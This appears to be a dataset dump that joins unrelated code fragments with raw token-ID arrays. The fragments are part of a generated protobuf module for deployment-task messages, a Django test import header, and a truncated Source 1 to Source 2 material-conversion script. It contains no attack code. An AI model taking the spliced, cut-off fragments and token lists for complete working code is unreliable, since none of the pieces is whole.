is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='oldName', full_name='deploy.CreateRequest.ConfigDiff.Detail.Items.oldName', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1820,
serialized_end=1875,
)
_CREATEREQUEST_CONFIGDIFF_DETAIL = _descriptor.Descriptor(
name='Detail',
full_name='deploy.CreateRequest.ConfigDiff.Detail',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='items', full_name='deploy.CreateRequest.ConfigDiff.Detail.items', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='packageId', full_name='deploy.CreateRequest.ConfigDiff.Detail.packageId', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='installPath', full_name='deploy.CreateRequest.ConfigDiff.Detail.installPath', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_CREATEREQUEST_CONFIGDIFF_DETAIL_ITEMS, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1708,
serialized_end=1875,
)
_CREATEREQUEST_CONFIGDIFF = _descriptor.Descriptor(
name='ConfigDiff',
full_name='deploy.CreateRequest.ConfigDiff',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='hosts', full_name='deploy.CreateRequest.ConfigDiff.hosts', index=0,
number=1, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='detail', full_name='deploy.CreateRequest.ConfigDiff.detail', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_CREATEREQUEST_CONFIGDIFF_DETAIL, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1621,
serialized_end=1875,
)
_CREATEREQUEST = _descriptor.Descriptor(
name='CreateRequest',
full_name='deploy.CreateRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='needNotify', full_name='deploy.CreateRequest.needNotify', index=0,
number=1, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='labels', full_name='deploy.CreateRequest.labels', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='appId', full_name='deploy.CreateRequest.appId', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='appName', full_name='deploy.CreateRequest.appName', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='clusterId', full_name='deploy.CreateRequest.clusterId', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='clusterType', full_name='deploy.CreateRequest.clusterType', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='batchNum', full_name='deploy.CreateRequest.batchNum', index=6,
number=7, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='batchInterval', full_name='deploy.CreateRequest.batchInterval', index=7,
number=8, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='batches', full_name='deploy.CreateRequest.batches', index=8,
number=9, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='failedStop', full_name='deploy.CreateRequest.failedStop', index=9,
number=10, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='targetId', full_name='deploy.CreateRequest.targetId', index=10,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='targetName', full_name='deploy.CreateRequest.targetName', index=11,
number=12, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='instanceId', full_name='deploy.CreateRequest.instanceId', index=12,
number=13, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='cluster', full_name='deploy.CreateRequest.cluster', index=13,
number=14, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='instanceInfo', full_name='deploy.CreateRequest.instanceInfo', index=14,
number=15, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='operationInfo', full_name='deploy.CreateRequest.operationInfo', index=15,
number=16, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='targetList', full_name='deploy.CreateRequest.targetList', index=16,
number=17, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='packageList', full_name='deploy.CreateRequest.packageList', index=17,
number=18, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='configList', full_name='deploy.CreateRequest.configList', index=18,
number=19, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='configPackageId', full_name='deploy.CreateRequest.configPackageId', index=19,
number=20, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='configDiff', full_name='deploy.CreateRequest.configDiff', index=20,
number=21, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_CREATEREQUEST_BATCHES, _CREATEREQUEST_INSTANCEINFO, _CREATEREQUEST_OPERATIONINFO, _CREATEREQUEST_CONFIGLIST, _CREATEREQUEST_CONFIGDIFF, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=320,
serialized_end=1875,
)
# NOTE: protoc-generated protobuf descriptor definitions — do not edit by hand;
# regenerate from the .proto source instead.
# Descriptor for the nested message deploy.CreateResponse.Data
# (a single string field `taskId`).
_CREATERESPONSE_DATA = _descriptor.Descriptor(
  name='Data',
  full_name='deploy.CreateResponse.Data',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='taskId', full_name='deploy.CreateResponse.Data.taskId', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=1965,
  serialized_end=1987,
)
# Descriptor for deploy.CreateResponse: int32 `code`, string `msg`,
# and a nested `Data` message field `data`.
_CREATERESPONSE = _descriptor.Descriptor(
  name='CreateResponse',
  full_name='deploy.CreateResponse',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='code', full_name='deploy.CreateResponse.code', index=0,
      number=1, type=5, cpp_type=1, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='msg', full_name='deploy.CreateResponse.msg', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='data', full_name='deploy.CreateResponse.data', index=2,
      number=3, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
  ],
  extensions=[
  ],
  nested_types=[_CREATERESPONSE_DATA, ],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=1877,
  serialized_end=1987,
)
# Descriptor for deploy.CreateResponseWrapper: int32 `code`, string
# `codeExplain`, string `error`, and a `CreateResponse` message field `data`.
_CREATERESPONSEWRAPPER = _descriptor.Descriptor(
  name='CreateResponseWrapper',
  full_name='deploy.CreateResponseWrapper',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='code', full_name='deploy.CreateResponseWrapper.code', index=0,
      number=1, type=5, cpp_type=1, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='codeExplain', full_name='deploy.CreateResponseWrapper.codeExplain', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='error', full_name='deploy.CreateResponseWrapper.error', index=2,
      number=3, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='data', full_name='deploy.CreateResponseWrapper.data', index=3,
      number=4, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=1989,
  serialized_end=2100,
)
# NOTE: protoc-generated wiring — links nested message descriptors to their
# containing types and resolves message-typed fields; do not edit by hand.
_CREATEREQUEST_BATCHES.fields_by_name['targets'].message_type = easy__flow__sdk_dot_model_dot_easy__flow_dot_deploy__target__pb2._DEPLOYTARGET
_CREATEREQUEST_BATCHES.containing_type = _CREATEREQUEST
_CREATEREQUEST_INSTANCEINFO.fields_by_name['versionInfo'].message_type = easy__flow__sdk_dot_model_dot_easy__flow_dot_version__info__pb2._VERSIONINFO
_CREATEREQUEST_INSTANCEINFO.containing_type = _CREATEREQUEST
_CREATEREQUEST_OPERATIONINFO.fields_by_name['versionToInfo'].message_type = easy__flow__sdk_dot_model_dot_easy__flow_dot_version__info__pb2._VERSIONINFO
_CREATEREQUEST_OPERATIONINFO.fields_by_name['versionFromInfo'].message_type = easy__flow__sdk_dot_model_dot_easy__flow_dot_version__info__pb2._VERSIONINFO
_CREATEREQUEST_OPERATIONINFO.containing_type = _CREATEREQUEST
_CREATEREQUEST_CONFIGLIST_CONFIGS_ITEMS.containing_type = _CREATEREQUEST_CONFIGLIST_CONFIGS
_CREATEREQUEST_CONFIGLIST_CONFIGS.fields_by_name['items'].message_type = _CREATEREQUEST_CONFIGLIST_CONFIGS_ITEMS
_CREATEREQUEST_CONFIGLIST_CONFIGS.containing_type = _CREATEREQUEST_CONFIGLIST
_CREATEREQUEST_CONFIGLIST.fields_by_name['configs'].message_type = _CREATEREQUEST_CONFIGLIST_CONFIGS
_CREATEREQUEST_CONFIGLIST.containing_type = _CREATEREQUEST
_CREATEREQUEST_CONFIGDIFF_DETAIL_ITEMS.containing_type = _CREATEREQUEST_CONFIGDIFF_DETAIL
_CREATEREQUEST_CONFIGDIFF_DETAIL.fields_by_name['items'].message_type = _CREATEREQUEST_CONFIGDIFF_DETAIL_ITEMS
_CREATEREQUEST_CONFIGDIFF_DETAIL.containing_type = _CREATEREQUEST_CONFIGDIFF
_CREATEREQUEST_CONFIGDIFF.fields_by_name['detail'].message_type = _CREATEREQUEST_CONFIGDIFF_DETAIL
_CREATEREQUEST_CONFIGDIFF.containing_type = _CREATEREQUEST
_CREATEREQUEST.fields_by_name['labels'].message_type = easy__flow__sdk_dot_model_dot_easy__flow_dot_deploy__label__pb2._DEPLOYLABEL
_CREATEREQUEST.fields_by_name['batches'].message_type = _CREATEREQUEST_BATCHES
_CREATEREQUEST.fields_by_name['cluster'].message_type = easy__flow__sdk_dot_model_dot_cmdb_dot_cluster__info__pb2._CLUSTERINFO
_CREATEREQUEST.fields_by_name['instanceInfo'].message_type = _CREATEREQUEST_INSTANCEINFO
_CREATEREQUEST.fields_by_name['operationInfo'].message_type = _CREATEREQUEST_OPERATIONINFO
_CREATEREQUEST.fields_by_name['targetList'].message_type = easy__flow__sdk_dot_model_dot_easy__flow_dot_target__info__pb2._TARGETINFO
_CREATEREQUEST.fields_by_name['packageList'].message_type = easy__flow__sdk_dot_model_dot_easy__flow_dot_package__info__pb2._PACKAGEINFO
_CREATEREQUEST.fields_by_name['configList'].message_type = _CREATEREQUEST_CONFIGLIST
_CREATEREQUEST.fields_by_name['configDiff'].message_type = _CREATEREQUEST_CONFIGDIFF
_CREATERESPONSE_DATA.containing_type = _CREATERESPONSE
_CREATERESPONSE.fields_by_name['data'].message_type = _CREATERESPONSE_DATA
_CREATERESPONSEWRAPPER.fields_by_name['data'].message_type = _CREATERESPONSE
# Expose the three top-level message descriptors on the file descriptor and
# register the file with the default symbol database.
DESCRIPTOR.message_types_by_name['CreateRequest'] = _CREATEREQUEST
DESCRIPTOR.message_types_by_name['CreateResponse'] = _CREATERESPONSE
DESCRIPTOR.message_types_by_name['CreateResponseWrapper'] = _CREATERESPONSEWRAPPER
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
# NOTE: protoc-generated message class for deploy.CreateRequest (with nested
# Batches / InstanceInfo / OperationInfo / ConfigList / ConfigDiff types);
# do not edit by hand.
CreateRequest = _reflection.GeneratedProtocolMessageType('CreateRequest', (_message.Message,), {
  'Batches' : _reflection.GeneratedProtocolMessageType('Batches', (_message.Message,), {
    'DESCRIPTOR' : _CREATEREQUEST_BATCHES,
    '__module__' : 'create_pb2'
    # @@protoc_insertion_point(class_scope:deploy.CreateRequest.Batches)
    })
  ,
  'InstanceInfo' : _reflection.GeneratedProtocolMessageType('InstanceInfo', (_message.Message,), {
    'DESCRIPTOR' : _CREATEREQUEST_INSTANCEINFO,
    '__module__' : 'create_pb2'
    # @@protoc_insertion_point(class_scope:deploy.CreateRequest.InstanceInfo)
    })
  ,
  'OperationInfo' : _reflection.GeneratedProtocolMessageType('OperationInfo', (_message.Message,), {
    'DESCRIPTOR' : _CREATEREQUEST_OPERATIONINFO,
    '__module__' : 'create_pb2'
    # @@protoc_insertion_point(class_scope:deploy.CreateRequest.OperationInfo)
    })
  ,
  'ConfigList' : _reflection.GeneratedProtocolMessageType('ConfigList', (_message.Message,), {
  'Configs' : _reflection.GeneratedProtocolMessageType('Configs', (_message.Message,), {
  'Items' : _reflection.GeneratedProtocolMessageType('Items', (_message.Message,), {
    'DESCRIPTOR' : _CREATEREQUEST_CONFIGLIST_CONFIGS_ITEMS,
    '__module__' : 'create_pb2'
    # @@protoc_insertion_point(class_scope:deploy.CreateRequest.ConfigList.Configs.Items)
    })
  ,
  'DESCRIPTOR' : _CREATEREQUEST_CONFIGLIST_CONFIGS,
  '__module__' : 'create_pb2'
  # @@protoc_insertion_point(class_scope:deploy.CreateRequest.ConfigList.Configs)
  })
  ,
  'DESCRIPTOR' : _CREATEREQUEST_CONFIGLIST,
  '__module__' : 'create_pb2'
  # @@protoc_insertion_point(class_scope:deploy.CreateRequest.ConfigList)
  })
  ,
  'ConfigDiff' : _reflection.GeneratedProtocolMessageType('ConfigDiff', (_message.Message,), {
  'Detail' : _reflection.GeneratedProtocolMessageType('Detail', (_message.Message,), {
  'Items' : _reflection.GeneratedProtocolMessageType('Items', (_message.Message,), {
    'DESCRIPTOR' : _CREATEREQUEST_CONFIGDIFF_DETAIL_ITEMS,
    '__module__' : 'create_pb2'
    # @@protoc_insertion_point(class_scope:deploy.CreateRequest.ConfigDiff.Detail.Items)
    })
  ,
  'DESCRIPTOR' : _CREATEREQUEST_CONFIGDIFF_DETAIL,
  '__module__' : 'create_pb2'
  # @@protoc_insertion_point(class_scope:deploy.CreateRequest.ConfigDiff.Detail)
  })
  ,
  'DESCRIPTOR' : _CREATEREQUEST_CONFIGDIFF,
  '__module__' : 'create_pb2'
  # @@protoc_insertion_point(class_scope:deploy.CreateRequest.ConfigDiff)
  })
  ,
  'DESCRIPTOR' : _CREATEREQUEST,
  '__module__' : 'create_pb2'
  # @@protoc_insertion_point(class_scope:deploy.CreateRequest)
  })
_sym_db.RegisterMessage(CreateRequest)
_sym_db.RegisterMessage(CreateRequest.Batches)
_sym_db.RegisterMessage(CreateRequest.InstanceInfo)
_sym_db.RegisterMessage(CreateRequest.OperationInfo)
_sym_db.RegisterMessage(CreateRequest.ConfigList)
_sym_db.RegisterMessage(CreateRequest.ConfigList.Configs)
_sym_db.RegisterMessage(CreateRequest.ConfigList.Configs.Items)
_sym_db.RegisterMessage(CreateRequest.ConfigDiff)
_sym_db.RegisterMessage(CreateRequest.ConfigDiff.Detail)
_sym_db.RegisterMessage(CreateRequest.ConfigDiff.Detail.Items)
# NOTE: protoc-generated message classes for deploy.CreateResponse (with
# nested Data) and deploy.CreateResponseWrapper; do not edit by hand.
CreateResponse = _reflection.GeneratedProtocolMessageType('CreateResponse', (_message.Message,), {
  'Data' : _reflection.GeneratedProtocolMessageType('Data', (_message.Message,), {
    'DESCRIPTOR' : _CREATERESPONSE_DATA,
    '__module__' : 'create_pb2'
    # @@protoc_insertion_point(class_scope:deploy.CreateResponse.Data)
    })
  ,
  'DESCRIPTOR' : _CREATERESPONSE,
  '__module__' : 'create_pb2'
  # @@protoc_insertion_point(class_scope:deploy.CreateResponse)
  })
_sym_db.RegisterMessage(CreateResponse)
_sym_db.RegisterMessage(CreateResponse.Data)
CreateResponseWrapper = _reflection.GeneratedProtocolMessageType('CreateResponseWrapper', (_message.Message,), {
  'DESCRIPTOR' : _CREATERESPONSEWRAPPER,
  '__module__' : 'create_pb2'
  # @@protoc_insertion_point(class_scope:deploy.CreateResponseWrapper)
  })
_sym_db.RegisterMessage(CreateResponseWrapper)
# @@protoc_insertion_point(module_scope)
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
2,
2980,
515,
416,
262,
8435,
11876,
17050,
13,
220,
8410,
5626,
48483,
0,
198,
2,
2723,
25,
2251,
13,
1676,
1462,
198,
198,
11748,
25064,
198,
62,
65,
28,
17597,
13... | 2.419066 | 16,291 |
from django.test import TestCase
import pandas as pd
from services.IndicatorCalc.indicators import BollingerIndicator, Indicator
from services.Utils.test_pusher import convert_to_dicts
from .signalgenerator import SignalGenerator
| [
6738,
42625,
14208,
13,
9288,
1330,
6208,
20448,
198,
198,
11748,
19798,
292,
355,
279,
67,
198,
198,
6738,
2594,
13,
5497,
26407,
9771,
66,
13,
521,
44549,
1330,
43479,
3889,
5497,
26407,
11,
1423,
26407,
198,
6738,
2594,
13,
18274,
... | 3.530303 | 66 |
# Converts Source 1 .vmt material files to simple Source 2 .vmat files.
#
# Copyright (c) 2016 Rectus
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# Usage Instructions:
# python vmt_to_vmat.py MODNAME OPTIONAL_PATH_TO_FOLDER
import sys
import os
import os.path
from os import path
import re
from PIL import Image
import PIL.ImageOps
# What shader to use in the generated .vmat files.
SHADER = 'vr_standard'
# File format of the textures.
TEXTURE_FILEEXT = '.tga'
# substring added after an alpha map's name, but before the extension
MAP_SUBSTRING = '_alpha'
# this leads to the root of the game folder, i.e. dota 2 beta/content/dota_addons/, make sure to remember the final slash!!
# (overwritten at runtime from global_vars.txt in the main section below)
PATH_TO_GAME_CONTENT_ROOT = ""
PATH_TO_CONTENT_ROOT = ""
# Set this to True if you wish to overwrite your old vmat files
OVERWRITE_VMAT = True
# material types need to be lowercase because python is a bit case sensitive
# VMT shader names this converter accepts as convertible materials.
materialTypes = [
    "vertexlitgeneric",
    "unlitgeneric",
    "lightmappedgeneric",
    "patch",
    "teeth",
    "eyes",
    "eyeball",
    #"modulate",
    "water", #TODO: integrate water/refract shaders into this script
    "refract",
    "worldvertextransition",
    #"lightmapped_4wayblend",
    "unlittwotexture", #TODO: make this system functional
    #"lightmappedreflective",
    #"cables"
]
# Fallback shader blocks inside a .vmt whose parameters must be skipped
# (handled via the skipNextLine flag in the main loop).
ignoreList = [
    "vertexlitgeneric_hdr_dx9",
    "vertexlitgeneric_dx9",
    "vertexlitgeneric_dx8",
    "vertexlitgeneric_dx7",
    "lightmappedgeneric_hdr_dx9",
    "lightmappedgeneric_dx9",
    "lightmappedgeneric_dx8",
    "lightmappedgeneric_dx7",
]
#flipNormalMap("materials/models/player/demo/demoman_normal.tga")
#extractAlphaTextures("materials/models/bots/boss_bot/carrier_body.tga")
###
### Main Execution
###
# Read user-editable settings (content root, reflectance range) from disk.
# NOTE(review): text_parser() is defined elsewhere in this file — not visible
# in this chunk; presumably returns a dict parsed from "key = value" lines.
globalVars = text_parser("global_vars.txt", " = ")
PATH_TO_GAME_CONTENT_ROOT = globalVars["gameContentRoot"]
# sys.argv[1] is the mod name (e.g. "hl2"); the converted content lives there.
PATH_TO_CONTENT_ROOT = PATH_TO_GAME_CONTENT_ROOT + sys.argv[1] + "/"
print(PATH_TO_CONTENT_ROOT)
# Bail out if global_vars.txt did not provide a content root.
if(PATH_TO_GAME_CONTENT_ROOT == ""):
    print("ERROR: Please open vmt_to_vmat in your favorite text editor, and modify PATH_TO_GAME_CONTENT_ROOT to lead to your games content files (i.e. ...\steamvr_environments\content\steamtours_addons\)")
    quit()
print('Source 2 Material Conveter! By Rectus via Github.')
print('Initially forked by Alpyne, this version by caseytube.')
print('--------------------------------------------------------------------------------------------------------')
# Verify file paths
# With an explicit path argument: accept a directory (recursed by parseDir,
# defined elsewhere in this file) or a single .vmt file.
fileList = []
if(len(sys.argv) == 3):
    absFilePath = os.path.abspath(sys.argv[2])
    if os.path.isdir(absFilePath):
        fileList.extend(parseDir(absFilePath))
    elif(absFilePath.lower().endswith('.vmt')):
        fileList.append(absFilePath)
    else:
        print("ERROR: File path is invalid. required format: vmt_to_vmat.py modName C:\optional\path\to\root")
        quit()
# Without a path argument: convert everything under the content root.
elif(len(sys.argv) == 2):
    absFilePath = os.path.abspath(PATH_TO_CONTENT_ROOT)
    print(PATH_TO_CONTENT_ROOT)
    if os.path.isdir(absFilePath):
        fileList.extend(parseDir(absFilePath))
    elif(absFilePath.lower().endswith('.vmt')):
        fileList.append(absFilePath)
    else:
        print("ERROR: File path is invalid. required format: vmt_to_vmat.py modName C:\optional\path\to\root")
        quit()
else:
    print("ERROR: CMD Arguments are invalid. Required format: vmt_to_vmat.py modName C:\optional\path\to\root")
    quit()
# Main function, loop through every .vmt
# Main loop: parse every collected .vmt, then emit a matching .vmat next to it.
# NOTE(review): parseVMTParameter, getVmatParameter, fixTexturePath,
# extractAlphaTextures and flipNormalMap are defined elsewhere in this file.
for fileName in fileList:
    print('--------------------------------------------------------------------------------------------------------')
    print('+ Loading File:\n' + fileName)
    # Per-file state gathered while scanning the .vmt parameters.
    vmtParameters = {}
    validMaterial = False
    validPatch = False
    skipNextLine = False
    matType = ""
    patchFile = ""
    basetexturePath = ""
    bumpmapPath = ""
    phong = False; #also counts for rimlight since they feed off each other
    baseMapAlphaPhongMask = False
    envMap = False
    baseAlphaEnvMapMask = False
    envMapMask = False
    normalMapAlphaEnvMapMask = False
    selfIllum = False
    translucent = False #also counts for alphatest
    alphatest = False
    wroteReflectanceRange = False
    # First pass: collect parameters, skipping fallback-shader sub-blocks.
    with open(fileName, 'r') as vmtFile:
        for line in vmtFile.readlines():
            if any(wd in line.lower() for wd in materialTypes):
                validMaterial = True
                matType = line.lower()
            if skipNextLine:
                # Stay in skip mode until the fallback block closes.
                if "]" in line or "}" in line:
                    skipNextLine = False
            else:
                parseVMTParameter(line, vmtParameters)
            if any(wd in line.lower() for wd in ignoreList):
                skipNextLine = True
    # "patch" materials wrap another .vmt; merge in the included file.
    if '"patch"' in matType.lower():
        patchFile = vmtParameters["include"].replace('"', '').replace("'", '');
        print("+ Patching materials details from: " + patchFile)
        with open(PATH_TO_CONTENT_ROOT + patchFile, 'r') as vmtFile:
            for line in vmtFile.readlines():
                if any(wd in line.lower() for wd in materialTypes):
                    validPatch = True
                parseVMTParameter(line, vmtParameters)
        if not validPatch:
            print("+ Patch file is not a valid material. Skipping!")
            continue
    if validMaterial:
        vmatFileName = fileName.replace('.vmt', '') + '.vmat'
        if os.path.exists(vmatFileName) and not OVERWRITE_VMAT:
            print('+ File already exists. Skipping!')
            continue
        print('+ Converting ' + os.path.basename(fileName))
        with open(vmatFileName, 'w') as vmatFile:
            vmatFile.write('// Converted with vmt_to_vmat.py\n\n')
            vmatFile.write('Layer0\n{\n\tshader "' + SHADER + '.vfx"\n\n')
